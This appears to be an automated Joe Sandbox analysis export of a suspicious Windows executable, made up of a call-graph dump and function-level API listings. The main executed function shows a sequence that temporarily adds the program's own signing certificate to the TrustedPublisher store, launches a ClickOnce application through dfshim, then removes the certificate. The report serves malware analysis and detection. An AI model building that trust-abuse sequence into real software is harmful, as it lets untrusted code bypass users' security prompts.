6773->6774 6774->6756 6775 91480c _abort 15 API calls 6775->6781 6776 913347 6778 913376 15 API calls 6776->6778 6779 91334d 6778->6779 6782 914869 _free 15 API calls 6779->6782 6780 913369 6783 91474d _abort 6 API calls 6780->6783 6781->6775 6781->6776 6781->6780 6784 914869 _free 15 API calls 6781->6784 6785 913345 6781->6785 6787 913eca 6781->6787 6782->6785 6786 913375 6783->6786 6784->6781 6785->6773 6788 913ed7 6787->6788 6789 913ee5 6787->6789 6788->6789 6794 913efc 6788->6794 6790 9147f9 _free 15 API calls 6789->6790 6791 913eed 6790->6791 6792 91473d _abort 21 API calls 6791->6792 6793 913ef7 6792->6793 6793->6781 6794->6793 6795 9147f9 _free 15 API calls 6794->6795 6795->6791 5804 913d8f 5805 913d9e 5804->5805 5809 913db2 5804->5809 5807 914869 _free 15 API calls 5805->5807 5805->5809 5806 914869 _free 15 API calls 5808 913dc4 5806->5808 5807->5809 5810 914869 _free 15 API calls 5808->5810 5809->5806 5811 913dd7 5810->5811 5812 914869 _free 15 API calls 5811->5812 5813 913de8 5812->5813 5814 914869 _free 15 API calls 5813->5814 5815 913df9 5814->5815 6475 91430f 6476 91431a 6475->6476 6480 91432a 6475->6480 6481 914330 6476->6481 6479 914869 _free 15 API calls 6479->6480 6482 914343 6481->6482 6483 914349 6481->6483 6484 914869 _free 15 API calls 6482->6484 6485 914869 _free 15 API calls 6483->6485 6484->6483 6486 914355 6485->6486 6487 914869 _free 15 API calls 6486->6487 6488 914360 6487->6488 6489 914869 _free 15 API calls 6488->6489 6490 91436b 6489->6490 6491 914869 _free 15 API calls 6490->6491 6492 914376 6491->6492 6493 914869 _free 15 API calls 6492->6493 6494 914381 6493->6494 6495 914869 _free 15 API calls 6494->6495 6496 91438c 6495->6496 6497 914869 _free 15 API calls 6496->6497 6498 914397 6497->6498 6499 914869 _free 15 API calls 6498->6499 6500 9143a2 6499->6500 6501 914869 _free 15 API calls 6500->6501 6502 9143b0 6501->6502 6507 9141f6 6502->6507 6513 914102 6507->6513 6509 91421a 6510 914246 6509->6510 6526 914163 6510->6526 6512 91426a 6512->6479 6514 91410e ___scrt_is_nonwritable_in_current_image 6513->6514 6521 9156e2 EnterCriticalSection 6514->6521 6516 914142 6522 914157 6516->6522 6518 914118 6518->6516 6520 914869 _free 15 API calls 6518->6520 6519 91414f _abort 6519->6509 6520->6516 6521->6518 6525 91572a LeaveCriticalSection 6522->6525 6524 914161 6524->6519 6525->6524 6527 91416f ___scrt_is_nonwritable_in_current_image 6526->6527 6534 9156e2 EnterCriticalSection 6527->6534 6529 914179 6530 9143d9 _abort 15 API calls 6529->6530 6531 91418c 6530->6531 6535 9141a2 6531->6535 6533 91419a _abort 6533->6512 6534->6529 6538 91572a LeaveCriticalSection 6535->6538 6537 9141ac 6537->6533 6538->6537 6041 9155ce GetCommandLineA GetCommandLineW 6042 918df1 6043 918e15 6042->6043 6044 918e2e 6043->6044 6046 919beb __startOneArgErrorHandling 6043->6046 6045 918e78 6044->6045 6050 9199d3 6044->6050 6049 919c2d __startOneArgErrorHandling 6046->6049 6058 91a1c4 6046->6058 6051 9199f0 DecodePointer 6050->6051 6054 919a00 6050->6054 6051->6054 6052 919a8d 6053 919a82 _ValidateLocalCookies 6052->6053 6055 9147f9 _free 15 API calls 6052->6055 6053->6045 6054->6052 6054->6053 6056 919a37 6054->6056 6055->6053 6056->6053 6057 9147f9 _free 15 API calls 6056->6057 6057->6053 6059 91a1fd __startOneArgErrorHandling 6058->6059 6060 91a495 __raise_exc RaiseException 6059->6060 6061 91a224 __startOneArgErrorHandling 6059->6061 6060->6061 6062 91a267 6061->6062 6063 91a242 6061->6063 6064 91a786 __startOneArgErrorHandling 15 API calls 6062->6064 6067 91a7b5 6063->6067 6066 91a262 __startOneArgErrorHandling _ValidateLocalCookies 6064->6066 6066->6049 6068 91a7c4 6067->6068 6069 91a838 __startOneArgErrorHandling 6068->6069 6071 91a7e3 __startOneArgErrorHandling 6068->6071 6070 91a786 __startOneArgErrorHandling 15 API calls 6069->6070 6072 91a831 6070->6072 6071->6072 6073 91a786 __startOneArgErrorHandling 15 API calls 6071->6073 6072->6066 6073->6072 6796 917570 6797 9175a9 6796->6797 6798 9147f9 _free 15 API calls 6797->6798 6802 9175d5 _ValidateLocalCookies 6797->6802 6799 9175b2 6798->6799 6800 91473d _abort 21 API calls 6799->6800 6801 9175bd _ValidateLocalCookies 6800->6801 5816 913eb5 5817 913eb8 5816->5817 5818 913f24 _abort 33 API calls 5817->5818 5819 913ec4 5818->5819 6074 911ff4 6077 912042 6074->6077 6078 911fff 6077->6078 6079 91204b 6077->6079 6079->6078 6080 9123c3 43 API calls 6079->6080 6081 912086 6080->6081 6082 9123c3 43 API calls 6081->6082 6083 912091 6082->6083 6084 913e89 33 API calls 6083->6084 6085 912099 6084->6085 5820 911ab8 5821 911aef 5820->5821 5822 911aca 5820->5822 5822->5821 5829 91209a 5822->5829 5841 9123c3 5829->5841 5832 9120a3 5833 9123c3 43 API calls 5832->5833 5834 911b06 5833->5834 5835 913e89 5834->5835 5836 913e95 _abort 5835->5836 5837 914424 _abort 33 API calls 5836->5837 5840 913e9a 5837->5840 5838 913f24 _abort 33 API calls 5839 913ec4 5838->5839 5840->5838 5855 9123d1 5841->5855 5843 911afc 5843->5832 5844 9123c8 5844->5843 5845 916b14 _abort 2 API calls 5844->5845 5846 913f29 5845->5846 5847 913f35 5846->5847 5850 916b6f _abort 33 API calls 5846->5850 5848 913f5c 5847->5848 5849 913f3e IsProcessorFeaturePresent 5847->5849 5852 913793 _abort 23 API calls 5848->5852 5851 913f49 5849->5851 5850->5847 5853 914573 _abort 3 API calls 5851->5853 5854 913f66 5852->5854 5853->5848 5856 9123da 5855->5856 5857 9123dd GetLastError 5855->5857 5856->5844 5867 9126a4 5857->5867 5860 912457 SetLastError 5860->5844 5861 9126df ___vcrt_FlsSetValue 6 API calls 5862 91240b 5861->5862 5863 9126df ___vcrt_FlsSetValue 6 API calls 5862->5863 5865 912433 5862->5865 5866 912411 5862->5866 5863->5865 5864 9126df ___vcrt_FlsSetValue 6 API calls 5864->5866 5865->5864 5865->5866 5866->5860 5868 912543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5867->5868 5869 9126be 5868->5869 5870 9126d6 TlsGetValue 5869->5870 5871 9123f2 5869->5871 5870->5871 5871->5860 5871->5861 5871->5866 5872 9148bb 5873 9148cb 5872->5873 5878 9148e1 5872->5878 5874 9147f9 _free 15 API calls 5873->5874 5875 9148d0 5874->5875 5876 91473d _abort 21 API calls 5875->5876 5887 9148da 5876->5887 5877 91494b 5902 9131ec 5877->5902 5878->5877 5883 914a2c 5878->5883 5891 914a4b 5878->5891 5881 9149b9 5882 914869 _free 15 API calls 5881->5882 5882->5883 5917 914c65 5883->5917 5884 9149b0 5884->5881 5888 914a3e 5884->5888 5908 9179bb 5884->5908 5889 91474d _abort 6 API calls 5888->5889 5890 914a4a 5889->5890 5892 914a57 5891->5892 5892->5892 5893 91480c _abort 15 API calls 5892->5893 5894 914a85 5893->5894 5895 9179bb 21 API calls 5894->5895 5896 914ab1 5895->5896 5897 91474d _abort 6 API calls 5896->5897 5898 914ae0 _abort 5897->5898 5899 914b81 FindFirstFileExA 5898->5899 5900 914bd0 5899->5900 5901 914a4b 21 API calls 5900->5901 5903 913201 5902->5903 5904 9131fd 5902->5904 5903->5904 5905 91480c _abort 15 API calls 5903->5905 5904->5884 5906 91322f 5905->5906 5907 914869 _free 15 API calls 5906->5907 5907->5904 5911 91790a 5908->5911 5909 91791f 5910 917924 5909->5910 5912 9147f9 _free 15 API calls 5909->5912 5910->5884 5911->5909 5911->5910 5915 91795b 5911->5915 5913 91794a 5912->5913 5914 91473d _abort 21 API calls 5913->5914 5914->5910 5915->5910 5916 9147f9 _free 15 API calls 5915->5916 5916->5913 5918 914c6f 5917->5918 5919 914c7f 5918->5919 5921 914869 _free 15 API calls 5918->5921 5920 914869 _free 15 API calls 5919->5920 5922 914c86 5920->5922 5921->5918 5922->5887 5923 9114bb IsProcessorFeaturePresent 5924 9114d0 5923->5924 5927 911493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5924->5927 5926 9115b3 5927->5926 6086 9112fb 6091 911aac SetUnhandledExceptionFilter 6086->6091 6088 911300 6092 9138f9 6088->6092 6090 91130b 6091->6088 6093 913905 6092->6093 6094 91391f 6092->6094 6093->6094 6095 9147f9 _free 15 API calls 6093->6095 6094->6090 6096 91390f 6095->6096 6097 91473d _abort 21 API calls 6096->6097 6098 91391a 6097->6098 6098->6090 6539 91383f 6540 91384b ___scrt_is_nonwritable_in_current_image 6539->6540 6541 913882 _abort 6540->6541 6547 9156e2 EnterCriticalSection 6540->6547 6543 91385f 6544 9167cb __fassign 15 API calls 6543->6544 6545 91386f 6544->6545 6548 913888 6545->6548 6547->6543 6551 91572a LeaveCriticalSection 6548->6551 6550 91388f 6550->6541 6551->6550 5928 9156a1 5929 9156ac 5928->5929 5931 9156d5 5929->5931 5933 9156d1 5929->5933 5934 9159b3 5929->5934 5939 9156f9 5931->5939 5935 915741 _abort 5 API calls 5934->5935 5936 9159da 5935->5936 5937 9159e3 _ValidateLocalCookies 5936->5937 5938 9159f8 InitializeCriticalSectionAndSpinCount 5936->5938 5937->5929 5938->5937 5940 915725 5939->5940 5941 915706 5939->5941 5940->5933 5942 915710 DeleteCriticalSection 5941->5942 5942->5940 5942->5942 6099 918ce1 6100 918d01 6099->6100 6103 918d38 6100->6103 6102 918d2b 6104 918d3f 6103->6104 6105 918da0 6104->6105 6106 918d5f 6104->6106 6107 919997 16 API calls 6105->6107 6108 91988e 6105->6108 6106->6108 6110 919997 16 API calls 6106->6110 6109 918dee 6107->6109 6108->6102 6109->6102 6111 9198be 6110->6111 6111->6102 6803 919160 6806 91917e 6803->6806 6805 919176 6807 919183 6806->6807 6808 9199d3 16 API calls 6807->6808 6809 919218 6807->6809 6810 9193af 6808->6810 6809->6805 6810->6805 6112 9133e5 6113 9133f7 6112->6113 6114 9133fd 6112->6114 6116 913376 6113->6116 6117 913383 6116->6117 6118 9133a0 6116->6118 6119 91339a 6117->6119 6120 914869 _free 15 API calls 6117->6120 6118->6114 6121 914869 _free 15 API calls 6119->6121 6120->6117 6121->6118 5943 915ba6 5944 915bb1 5943->5944 5946 915bd7 5943->5946 5945 915bc1 FreeLibrary 5944->5945 5944->5946 5945->5944 6552 916026 6555 91602b 6552->6555 6554 91604e 6555->6554 6556 915c56 6555->6556 6557 915c63 6556->6557 6558 915c85 6556->6558 6559 915c71 DeleteCriticalSection 6557->6559 6560 915c7f 6557->6560 6558->6555 6559->6559 6559->6560 6561 914869 _free 15 API calls 6560->6561 6561->6558 6122 919beb 6123 919c04 __startOneArgErrorHandling 6122->6123 6124 919c2d __startOneArgErrorHandling 6123->6124 6125 91a1c4 16 API calls 6123->6125 6125->6124 6562 91452d 6570 915858 6562->6570 6564 914537 6565 9144a8 _abort 15 API calls 6564->6565 6569 914541 6564->6569 6566 914549 6565->6566 6567 914556 6566->6567 6575 914559 6566->6575 6571 915741 _abort 5 API calls 6570->6571 6572 91587f 6571->6572 6573 915897 TlsAlloc 6572->6573 6574 915888 _ValidateLocalCookies 6572->6574 6573->6574 6574->6564 6576 914569 6575->6576 6577 914563 6575->6577 6576->6569 6579 9158ae 6577->6579 6580 915741 _abort 5 API calls 6579->6580 6581 9158d5 6580->6581 6582 9158e1 _ValidateLocalCookies 6581->6582 6583 9158ed TlsFree 6581->6583 6582->6576 6583->6582 6584 91142e 6587 912cf0 6584->6587 6586 91143f 6588 9144a8 _abort 15 API calls 6587->6588 6589 912d07 _ValidateLocalCookies 6588->6589 6589->6586

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00911000 Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 199encryptionmemorylibraryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00000104), ref: 00911016
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00911025
                                                                                                                                                                                                                                                        • CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00911032
                                                                                                                                                                                                                                                        • LocalAlloc.KERNELBASE(00000000,00040000), ref: 00911057
                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00040000), ref: 00911063
                                                                                                                                                                                                                                                        • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00911082
                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 009110B2
                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?), ref: 009110C5
                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00002000), ref: 009110F4
                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 0091110A
                                                                                                                                                                                                                                                        • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 0091111A
                                                                                                                                                                                                                                                        • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 0091112D
                                                                                                                                                                                                                                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 00911134
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0091113E
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0091115D
                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 0091116E
                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00911182
                                                                                                                                                                                                                                                        • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00911198
                                                                                                                                                                                                                                                        • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 009111A9
                                                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(dfshim), ref: 009111BA
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 009111C6
                                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00009C40), ref: 009111E8
                                                                                                                                                                                                                                                        • CertDeleteCertificateFromStore.CRYPT32(?), ref: 0091120B
                                                                                                                                                                                                                                                        • CertCloseStore.CRYPT32(?,00000000), ref: 0091121A
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00911223
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00911228
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0091122D
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                                                                                        • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                                                                                        • API String ID: 335784236-860318880
                                                                                                                                                                                                                                                        • Opcode ID: 7a5eb8691f07f685b0b582aff76447329d4d2636b4f7abbf50ba64ab2758aab1
                                                                                                                                                                                                                                                        • Instruction ID: df69660eb118b33f706f32b1e1f61709e5f5e5f00340623448dff86a066c39e4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a5eb8691f07f685b0b582aff76447329d4d2636b4f7abbf50ba64ab2758aab1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6616A71B54218BFEB219B90DC49FEEBBBAEF48B50F104054FA14B72A0C7719941DBA4

                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                        Function 0091191F Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0091192B
                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 009119F7
                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00911A10
                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00911A1A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 254469556-0
                                                                                                                                                                                                                                                        • Opcode ID: 5d3e2505145f740dd1827e114ce7604b8972ec5029f67d2af60a0092bbbdb80b
                                                                                                                                                                                                                                                        • Instruction ID: 081d491743bf44fc0c7db27e4db4e8f5c8697f8f682218fd7eeb8a253afb89b2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d3e2505145f740dd1827e114ce7604b8972ec5029f67d2af60a0092bbbdb80b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5310875E0522C9BDF21EFA4D9497CDBBB8AF08300F1041AAE50CAB254EB759A85CF45
                                                                                                                                                                                                                                                        Function 00914573 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0091466B
                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00914675
                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00914682
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                                        • Opcode ID: 3ac263ef9c8925ad415bb28af206b5b675f1af6cc28d9f6f94e256d061af5dee
                                                                                                                                                                                                                                                        • Instruction ID: 0d360970edaa95a10c92dffd6c380d193f825bb136b17fd925d8d5dd92aa6b1c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ac263ef9c8925ad415bb28af206b5b675f1af6cc28d9f6f94e256d061af5dee
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1431B474A5122CABCB21DF64D989BDDB7B8AF48310F5041DAE41CA7260E7709BC58F45
                                                                                                                                                                                                                                                        Function 00913677 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,0091364D,?,009202E0,0000000C,009137A4,?,00000002,00000000,?,00913F66,00000003,0091209F,00911AFC), ref: 00913698
                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,0091364D,?,009202E0,0000000C,009137A4,?,00000002,00000000,?,00913F66,00000003,0091209F,00911AFC), ref: 0091369F
                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 009136B1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                        • Opcode ID: 44d2bfeb75748353d38dac08fd7692d97f6efb2b6f6258b22b52b8a8442777d9
                                                                                                                                                                                                                                                        • Instruction ID: cc5c6f03f7fa796e6f5479e94ae913eac395081ebf4e84bfcfd065f6cbb68808
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44d2bfeb75748353d38dac08fd7692d97f6efb2b6f6258b22b52b8a8442777d9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65E0463122410CEFCF11AF54DD0AADA3B7AEF88381B018014FA158A231DB35DE82DA50
                                                                                                                                                                                                                                                        Function 00914A4B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                                                                                                                        • Opcode ID: e38adce62225f0cbaded1c4e0f6c4bcc767f4b65a910172b0630d47daf8c0b4d
                                                                                                                                                                                                                                                        • Instruction ID: aa56a20371eea3c2afbf432482f892e7f656a24c8a04082b3db116ee1571e87a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e38adce62225f0cbaded1c4e0f6c4bcc767f4b65a910172b0630d47daf8c0b4d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6831E272A4424DABCB24DE78CC84FFE7BBDEF89314F0441A8F51997251E6309D858B90
                                                                                                                                                                                                                                                        Function 0091A495 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0091A490,?,?,00000008,?,?,0091A130,00000000), ref: 0091A6C2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                                                                                                        • Opcode ID: 29226b113068e6736462cf0f2f9e9d343b76d573ae4b21b866bf9a9ef50a8402
                                                                                                                                                                                                                                                        • Instruction ID: a6fbb5fb42e6c0b72eeaa85ed3a29583381be60baffadb82d69e4a9f7123bea5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29226b113068e6736462cf0f2f9e9d343b76d573ae4b21b866bf9a9ef50a8402
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2B15C716116089FD715CF28C48ABA47BE1FF45364F298658E89ACF2E1C339DE92CB41
                                                                                                                                                                                                                                                        Function 00911BD4 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00911BEA
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2325560087-0
                                                                                                                                                                                                                                                        • Opcode ID: d4aaba6516bbd130366d6fcc3948309cb9f3dae1417ce1b9686478af5b395e7d
                                                                                                                                                                                                                                                        • Instruction ID: 0343ef135e0cf9a19cea7416154b5bdd8df13d4a876d0da66f6a5bb3a42b7a03
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4aaba6516bbd130366d6fcc3948309cb9f3dae1417ce1b9686478af5b395e7d
